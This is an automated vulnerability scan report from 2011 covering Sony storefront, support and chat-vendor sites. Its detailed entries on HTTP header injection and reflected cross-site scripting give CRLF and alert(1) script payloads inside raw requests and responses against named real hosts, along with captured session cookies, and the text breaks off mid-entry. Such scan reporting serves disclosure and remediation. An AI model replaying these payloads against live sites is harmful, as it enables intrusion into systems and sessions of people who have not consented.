XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 06232011

Report generated by XSS.CX at Thu Jun 23 10:54:06 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

1. HTTP header injection

1.1. http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay [REST URL parameter 1]

1.2. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYNewsletterOptInView [REST URL parameter 1]

1.3. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay [REST URL parameter 1]

1.4. https://www.sonystyle.com/webapp/wcs/stores/servlet/CRMPortalHome [REST URL parameter 1]

2. Cross-site scripting (reflected)

2.1. http://sales.liveperson.net/hc/71737897/ [msessionkey parameter]

2.2. http://sonystyle.custhelp.com/cgi-bin/sonystyle.cfg/php/xml_api/cci/feedback.php [source parameter]

2.3. http://www.sonystyle.com/webapp/wcs/stores/servlet/ContentDisplayView [cmsId parameter]

2.4. https://www.websitealive5.com/4405/operator/guest/gLogin_Server.asp [action parameter]

2.5. https://www.websitealive5.com/4405/operator/guest/gLogin_Server.asp [vbrowser parameter]

2.6. https://www.websitealive5.com/4405/operator/guest/gLogin_Server.asp [vbrowser parameter]

2.7. http://solutions.liveperson.com/ref/lppb.asp [Referer HTTP header]

3. SSL cookie without secure flag set

3.1. https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp

3.2. https://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0

3.3. https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0

4. Session token in URL

4.1. http://sales.liveperson.net/hc/71737897/

4.2. https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp

4.3. https://www.websitealive5.com/4405/operator/guest/gDefault_v2.asp

5. Cookie scoped to parent domain

5.1. http://www.opensource.org/licenses/mit-license.php

5.2. http://solutions.liveperson.com/ref/lppb.asp

5.3. http://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0

5.4. https://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0

5.5. https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0

5.6. http://www.facebook.com/sonyelectronics

5.7. http://www.flickr.com/groups/sonycameraclub

5.8. http://www.flickr.com/groups/sonycameraclub/

6. Cookie without HttpOnly flag set

6.1. http://security.symantec.com/default.asp

6.2. https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp

6.3. http://solutions.liveperson.com/ref/lppb.asp

6.4. http://sony.storagesupport.com/

6.5. http://www.docs.sony.com/reflib/docget.asp

6.6. http://www.docs.sony.com/startchat.asp

6.7. http://www.opensource.org/licenses/mit-license.php

6.8. http://www.sonycreativesoftware.com/

6.9. http://sales.liveperson.net/hc/71737897/

6.10. http://sony.tcliveus.com/i

6.11. http://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0

6.12. https://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0

6.13. https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0

6.14. http://twitter.com/sonyoutletusa

6.15. http://us.playstation.com/psn/

6.16. http://www.facebook.com/sonyelectronics

6.17. http://www.flickr.com/groups/sonycameraclub

6.18. http://www.flickr.com/groups/sonycameraclub/

6.19. http://www.omnitechsupport.com/sony/index.php

6.20. http://www.sony.com/

6.21. http://www.sony.com/index.php

6.22. http://www.sony.com/storagemedia

6.23. http://www.sonystyle.com/

6.24. http://www.sonystyle.com/webapp/wcs/stores/servlet/OrderItemDisplay

6.25. http://www.sonystyle.com/webapp/wcs/stores/servlet/ReturnProductInfo

6.26. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYRedirectURLControllerCmd

6.27. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYWishListDisplay

6.28. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYWishListDisplay

6.29. http://www.us.playstation.com/

6.30. http://www.us.playstation.com/Support

7. Password field with autocomplete enabled

7.1. http://twitter.com/sonyoutletusa

7.2. http://www.facebook.com/sonyelectronics

7.3. https://www.sonystyle.com/webapp/wcs/stores/servlet/CRMPortalHome

8. Referer-dependent response

9. Cross-domain POST

9.1. http://wiki.novemberborn.net/sifr3/DetectingCSSLoad

9.2. http://wiki.novemberborn.net/sifr3/JavaScript+Configuration

9.3. http://wiki.novemberborn.net/sifr3/JavaScript+Methods

9.4. http://wiki.novemberborn.net/sifr3/Styling

9.5. http://www.huddletogether.com/projects/lightbox2/

9.6. http://www.omnitechsupport.com/

9.7. http://www.omnitechsupport.com/

9.8. http://www.omnitechsupport.com/about.php

9.9. http://www.omnitechsupport.com/fee.php

9.10. http://www.omnitechsupport.com/fee.php

9.11. http://www.omnitechsupport.com/fee.php

9.12. http://www.omnitechsupport.com/fee.php

9.13. http://www.omnitechsupport.com/fee.php

9.14. http://www.omnitechsupport.com/fee.php

9.15. http://www.omnitechsupport.com/fee.php

9.16. http://www.omnitechsupport.com/fee.php

9.17. http://www.omnitechsupport.com/fee.php

9.18. http://www.omnitechsupport.com/fee.php

9.19. http://www.omnitechsupport.com/fee.php

9.20. http://www.omnitechsupport.com/fee.php

9.21. http://www.omnitechsupport.com/fee.php

9.22. http://www.omnitechsupport.com/spyware_removal.php

9.23. http://www.omnitechsupport.com/spyware_removal.php

10. Cross-domain Referer leakage

10.1. http://sonystyle.custhelp.com/cgi-bin/sonystyle.cfg/php/xml_api/cci/feedback.php

10.2. http://www.facebook.com/plugins/likebox.php

10.3. http://www.omnitechsupport.com/sony/index.php

10.4. http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay

10.5. http://www.sonystyle.com/webapp/wcs/stores/servlet/ContentDisplayView

10.6. http://www.sonystyle.com/webapp/wcs/stores/servlet/ContentDisplayView

10.7. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYNewsletterOptInView

10.8. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYSiteMapView

10.9. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYWishListDisplay

10.10. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

10.11. https://www.sonystyle.com/webapp/wcs/stores/servlet/CRMPortalHome

10.12. https://www.websitealive5.com/4405/operator/guest/gDefault_v2.asp

11. Cross-domain script include

11.1. http://script.aculo.us/

11.2. http://twitter.com/sonyoutletusa

11.3. http://us.playstation.com/psn/

11.4. http://www.facebook.com/plugins/likebox.php

11.5. http://www.facebook.com/sonyelectronics

11.6. http://www.flickr.com/groups/sonycameraclub

11.7. http://www.flickr.com/groups/sonycameraclub/

11.8. http://www.huddletogether.com/projects/lightbox2/

11.9. http://www.omnitechsupport.com/about.php

11.10. http://www.omnitechsupport.com/spyware_removal.php

11.11. http://www.opensource.org/licenses/mit-license.php

11.12. http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay

11.13. http://www.sonystyle.com/webapp/wcs/stores/servlet/ContentDisplayView

11.14. http://www.sonystyle.com/webapp/wcs/stores/servlet/OrderItemDisplay

11.15. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYNewsletterOptInView

11.16. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYSiteMapView

11.17. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYWishListDisplay

11.18. http://www.sonystyle.com/webapp/wcs/stores/servlet/SearchCatalog

11.19. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

11.20. https://www.sonystyle.com/webapp/wcs/stores/servlet/CRMPortalHome

12. TRACE method is enabled

13. Email addresses disclosed

13.1. http://www.flickr.com/groups/sonycameraclub

13.2. http://www.flickr.com/groups/sonycameraclub/

13.3. http://www.huddletogether.com/projects/lightbox2/

13.4. http://www.omnitechsupport.com/

13.5. http://www.omnitechsupport.com/about.php

13.6. http://www.omnitechsupport.com/fee.php

13.7. http://www.omnitechsupport.com/spyware_removal.php

13.8. http://www.opensource.org/licenses/mit-license.php

13.9. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js

13.10. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js

13.11. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js

13.12. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYNewsletterOptInView

14. Private IP addresses disclosed

14.1. http://www.facebook.com/plugins/likebox.php

14.2. http://www.facebook.com/sonyelectronics

14.3. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js

14.4. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_home_eventListeners.js

15. Robots.txt file

15.1. http://www.google-analytics.com/__utm.gif

15.2. http://www.googleadservices.com/pagead/conversion/1047459996/

15.3. http://www.omnitechsupport.com/sony/index.php

16. Cacheable HTTPS response

17. HTML does not specify charset

17.1. http://www.docs.sony.com/reflib/docget.asp

17.2. http://www.docs.sony.com/startchat.asp

17.3. http://www.sonystyle.com/4a76d%0d%0aLocation:%20http://xss.cx

17.4. http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay

17.5. http://www.sonystyle.com/webapp/wcs/stores/servlet/ContentDisplayView

17.6. https://www.websitealive5.com/4405/operator/guest/gLogin_Server.asp

17.7. https://www.websitealive5.com/favicon.ico

18. Content type incorrectly stated

18.1. http://sr2.liveperson.net/hcp/html/mTag.js

18.2. http://www.apache.org/licenses/LICENSE-2.0

18.3. http://www.docs.sony.com/reflib/docget.asp

18.4. https://www.websitealive5.com/4405/operator/guest/gLogin_Server.asp

18.5. https://www.websitealive5.com/favicon.ico

19. Content type is not specified

19.1. http://www.sonystyle.com/favicon.ico

19.2. http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay



1. HTTP header injection
There are 4 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


1.1. http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/CategoryDisplay

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8b9c9%0d%0ad30a80f6707 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8b9c9%0d%0ad30a80f6707/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=8198552921644643900&XID=M:esupport HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: http://www.sonystyle.com/webapp/wcs/stores/servlet/SYRedirectURLControllerCmd?source=/8b9c9
d30a80f6707
/wcs/stores/servlet/CategoryDisplay&catalogId=10551&storeId=10151&langId=-1&categoryId=8198552921644643900&XID=M: esupport
Content-Length: 537
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 23 Jun 2011 15:20:10 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.sonystyle.com/webapp/wcs/stores/serv
...[SNIP]...

1.2. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYNewsletterOptInView [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/SYNewsletterOptInView

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 28059%0d%0a55571c41948 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /28059%0d%0a55571c41948/wcs/stores/servlet/SYNewsletterOptInView?storeId=10151&catalogId=10551&langId=-1&XID=M:esupport HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: http://www.sonystyle.com/webapp/wcs/stores/servlet/SYRedirectURLControllerCmd?source=/28059
55571c41948
/wcs/stores/servlet/SYNewsletterOptInView&storeId=10151&catalogId=10551&langId=-1&XID=M: esupport
Content-Length: 508
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 15:20:26 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.sonystyle.com/webapp/wcs/stores/serv
...[SNIP]...

1.3. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/StoreCatalogDisplay

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4a76d%0d%0aacf572565ef was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4a76d%0d%0aacf572565ef/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&XID=M:sidenav:esupport HTTP/1.1
Host: www.sonystyle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ensRefId=http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=17410958ILJeqRHT23LY; sifrFetch=true; s_cc=true; s_vi=[CS]v1|2701AA430515874D-60000181000007CB[CE]; JSESSIONID=0000GBxzJ8ocWqxo7Twu8MoxGDb:14aelt0ld; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=yvTBhIsIzJXeq0V1jN5EG7plRAA%3d%0a%3b2011%2d06%2d23+10%3a58%3a28%2e003%5f1308841107995%2d82466%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRP7uidpXvVAq2h%0aJC2GZox%2bEO9n57RB95%2fBJ6N%2fOyuJlvGbaiD7FrSmImcI6%2bWFUECX5dn2JvAzvA5MAH9zFwLDmQ%3d%3d; WC_GENERIC_ACTIVITYDATA=[1131585542%3atrue%3afalse%3a0%3aOJQ8PE3BCkIUlGMHsRAnJG9WJb4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; TS5bbf46=85ddbc91e1d02d84452784d87f823ca75e46b2c7608495f34e035480db2332020de46713222f7b4ed69e61a0; fsr.s={"v":1,"rid":"1308841108174_99949","cp":{"cybershot":"N","innovation":"N","experts":"N"},"pv":1,"c":"http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; mbox=check#true#1308841151|session#1308841090453-474854#1308842951|PC#1308841090453-474854.17#1310050710; 71737897-VID=16101514677756; 71737897-SKEY=4916265021794629949; HumanClickSiteContainerID_71737897=STANDALONE; s_visit=1; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 302 Moved Temporarily
Location: http://www.sonystyle.com/webapp/wcs/stores/servlet/SYRedirectURLControllerCmd?source=/4a76d
acf572565ef
/wcs/stores/servlet/StoreCatalogDisplay&langId=-1&storeId=10151&catalogId=10551&XID=M: sidenav:esupport
Content-Length: 514
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 15:18:27 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.sonystyle.com/webapp/wcs/stores/serv
...[SNIP]...

1.4. https://www.sonystyle.com/webapp/wcs/stores/servlet/CRMPortalHome [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/CRMPortalHome

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload b1f95%0d%0a9bd0f0f51d9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /b1f95%0d%0a9bd0f0f51d9/wcs/stores/servlet/CRMPortalHome?langId=-1&storeId=10151&catalogId=10551&XID=M:sidenav:esupport HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: https://www.sonystyle.com/webapp/wcs/stores/servlet/SYRedirectURLControllerCmd?source=/b1f95
9bd0f0f51d9
/wcs/stores/servlet/CRMPortalHome&langId=-1&storeId=10151&catalogId=10551&XID=M: sidenav:esupport
Content-Length: 510
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 23 Jun 2011 15:20:39 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.sonystyle.com/webapp/wcs/stores/ser
...[SNIP]...

2. Cross-site scripting (reflected)
There are 7 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://sales.liveperson.net/hc/71737897/ [msessionkey parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/71737897/

Issue detail

The value of the msessionkey request parameter is copied into the HTML document as plain text between tags. The payload 8c50e<img%20src%3da%20onerror%3dalert(1)>3de729ec697 was submitted in the msessionkey parameter. This input was echoed as 8c50e<img src=a onerror=alert(1)>3de729ec697 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hc/71737897/?&visitor=16101514677756&msessionkey=49162650217946299498c50e<img%20src%3da%20onerror%3dalert(1)>3de729ec697&siteContainer=STANDALONE&site=71737897&cmd=mTagKnockPage&lpCallId=986859841504-958643907680&protV=20&lpjson=1&id=8121771027&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sonystyle-sales-general-english%7ClpMTagConfig.db1%7ClpButton-DIV%7C%23chat-sonystyle-service-english%7ClpMTagConfig.db1%7ClpButton-DIV-service%7C%23chat-sonystyle-sales-cart-english%7ClpMTagConfig.db1%7ClpButton-DIV-checkout%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&XID=M:sidenav:esupport
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=4916265021794629949; HumanClickSiteContainerID_71737897=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:17:23 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=49162650217946299498c50e<img src=a onerror=alert(1)>3de729ec697; path=/hc/71737897
Set-Cookie: HumanClickKEY=49162650217946299498c50e<img src=a onerror=alert(1)>3de729ec697; path=/hc/71737897
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Thu, 23 Jun 2011 15:17:23 GMT
Set-Cookie: HumanClickSiteContainerID_71737897=STANDALONE; path=/hc/71737897
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 31206

lpConnLib.Process({"ResultSet": {"lpCallId":"986859841504-958643907680","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...
code_id": "FPCookie", "js_code": "lpMTagConfig.FPC_VID_NAME='71737897-VID'; lpMTagConfig.FPC_VID='16101514677756'; lpMTagConfig.FPC_SKEY_NAME='71737897-SKEY'; lpMTagConfig.FPC_SKEY='49162650217946299498c50e<img src=a onerror=alert(1)>3de729ec697';lpMTagConfig.FPC_CONT_NAME='HumanClickSiteContainerID_71737897'; lpMTagConfig.FPC_CONT='STANDALONE'"},{"code_id": "SYSTEM!firstpartycookies_compact.js", "js_code": "function lpFirstPartyCookieSupport
...[SNIP]...

2.2. http://sonystyle.custhelp.com/cgi-bin/sonystyle.cfg/php/xml_api/cci/feedback.php [source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sonystyle.custhelp.com
Path:   /cgi-bin/sonystyle.cfg/php/xml_api/cci/feedback.php

Issue detail

The value of the source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73185"><script>alert(1)</script>86f752791d1 was submitted in the source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/sonystyle.cfg/php/xml_api/cci/feedback.php?source=73185"><script>alert(1)</script>86f752791d1 HTTP/1.1
Host: sonystyle.custhelp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:36 GMT
Server: Apache
RNT-Time: D=134191 t=1308842376214677
RNT-Machine: 09
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15137

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:rn="http://schemas.rightnow.com/crm/document">
<head>
<script type="text/javascript" src="/rnt/rnw/javascript/enduser.js" language="JavaScript"></scr
...[SNIP]...
<input type="hidden" id="q_28_28" rows="3" cols="40" "text" name="q_28" value="73185"><script>alert(1)</script>86f752791d1" />
...[SNIP]...

2.3. http://www.sonystyle.com/webapp/wcs/stores/servlet/ContentDisplayView [cmsId parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/ContentDisplayView

Issue detail

The value of the cmsId request parameter is copied into a JavaScript rest-of-line comment. The payload 63c67%0ac304ff0fa44 was submitted in the cmsId parameter. This input was echoed as 63c67
c304ff0fa44
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webapp/wcs/stores/servlet/ContentDisplayView?cmsId=smb_landing_page63c67%0ac304ff0fa44&catalogId=10551&storeId=10151&langId=-1 HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 72493
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:15 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Content-Length: 72493


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- AllSitesHeadInclude -
...[SNIP]...
king
s.eVar8=''
// SQS tracking
var SQS = getURLParameter("SQS");
if (SQS == '') SQS = getURLParameter("sqs");
if (SQS != '') {
s.eVar9 = SQS;
}
// CMS Spot Tracking
s.eVar10=_cmsId;//'smb_landing_page63c67
c304ff0fa44
';
// Geo Segmentation City
s.eVar11=''
// Geo Segmentation State
s.eVar12=''
// Geo Segmentation Country
s.eVar13=''
// Coupon Tracking
s.eVar14=''
// Campaign Tracking
var campaign = getURLParameter(
...[SNIP]...

2.4. https://www.websitealive5.com/4405/operator/guest/gLogin_Server.asp [action parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.websitealive5.com
Path:   /4405/operator/guest/gLogin_Server.asp

Issue detail

The value of the action request parameter is copied into the HTML document as plain text between tags. The payload 65bd4<script>alert(1)</script>d76e4a52225 was submitted in the action parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /4405/operator/guest/gLogin_Server.asp?groupid=4405&action=writeinfocapture65bd4<script>alert(1)</script>d76e4a52225&ismobile=False&vbrowser=other&skin_id=4621&infocapture_ids=&infocapture_values=&departmentid=5101 HTTP/1.1
Host: www.websitealive5.com
Connection: keep-alive
Referer: https://www.websitealive5.com/4405/operator/guest/gDefault_v2.asp?cframe=login&chattype=normal&groupid=4405&websiteid=150&departmentid=5101&sessionid_=370043&iniframe=&ppc_id=&autostart=&text2chat_info=&loginname=&loginnamelast=&loginemail=&loginphone=&infocapture_ids=&infocapture_values=&dl=http%3A%2F%2Fwww%2Eomnitechsupport%2Ecom%2Fabout%2Ephp&loginquestion=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAQSSBBCC=EHNLLBEBNIJJJKCLOEIKFCHO; ASPSESSIONIDAQSSAADD=LGJFONDBOCBFHBFFGEDMAIAF; BIGipServerWebSiteAlive_WWW-1=355578890.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, private,private
Pragma: no-cache
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
